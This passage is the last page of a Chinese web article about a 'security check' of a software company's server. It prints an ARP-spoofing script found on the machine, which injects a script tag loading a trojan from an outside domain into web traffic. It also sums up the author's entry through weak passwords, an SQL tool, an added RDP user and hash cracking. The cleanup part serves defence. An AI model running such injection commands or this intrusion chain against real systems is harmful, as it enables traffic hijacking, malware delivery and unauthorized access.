WEB开发网
开发学院网络安全安全技术 对某软件公司的一次安全检测 阅读

对某软件公司的一次安全检测

 2008-11-25 13:33:21 来源:WEB开发网   
核心提示: 图20查找系统漏洞并修复2.找到系统arp挂马代码在系统wmpub目录中发现大量的可执行文件和批处理,直接查看crss.bat脚本文件,对某软件公司的一次安全检测(7),如图21所示,其代码如下:smss.exe -idx 0 -ip 221.5.250.2-221.5.250.130 -

对某软件公司的一次安全检测

图20查找系统漏洞并修复

2.找到系统arp挂马代码

在系统wmpub目录中发现大量的可执行文件和批处理,直接查看crss.bat脚本文件,如图21所示,其代码如下:

smss.exe -idx 0 -ip 221.5.250.2-221.5.250.130 -port 80 -insert "

< SCRIPT language=javascript src="

(A href='http://www.forklift-shuangli.com/ccwu/admin/up/flash.js")

%20(%20/%20script') http://www.forklift-shuangli.com/ccwu/admin/up/flash.js">

< / SCRIPT < A > > " -spoofmode 2

该代码为典型的流量劫持,将访问221.5.250.2-221.5.250.130网段的80端口全部转向到“http://www.forklift-shuangli.com/ccwu/admin/up/flash.js”地址,该地址明显为木马地址。

对某软件公司的一次安全检测

图21找到arp挂马代码

3.使用autoruns软件查看系统服务等情况

使用autoruns软件查看系统的服务等运行情况,在其中可以看到有灰鸽子服务,直接删除其中的一些木马程序和可疑程序,如图22所示。

对某软件公司的一次安全检测

图22 找到灰鸽子服务

4.使用360安全卫士进行安全加固

下载360安全卫士最新版本,运行360安全卫士,使用其来查杀系统中的木马等病毒,如图23所示,在安装时就检测出3个病毒文件,安装完毕后,查杀系统中的恶意插件以及病毒。

对某软件公司的一次安全检测

图23使用360卫士查杀病毒

四、总结与收获

本次检测使用的是一些比较简单的技术,弱口令扫描,然后就是利用“SQL综合利用工具”直接连接数据库,通过添加用户直接登录3389,进而全面控制系统。在系统中发现了包括灰鸽子在内的多个木马程序,其中还有arp挂马程序,后面通过获取系统密码hash,通过导入lc5破解,发现该系统的密码就是数据库sa所对应的密码,如图24所示,如果在最初使用这个密码尝试一下,会更快的进入系统,这就是社会工程学的厉害之处。

对某软件公司的一次安全检测

图24 使用lc5破解系统密码

在文章结束时,对该服务器重新进行连接,发现添加到用户已经被删除,ftp也设置密码,但是通过sqltools仍然可以连接进入系统。

上一页  2 3 4 5 6 7 

Tags:软件公司 一次 安全检测

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接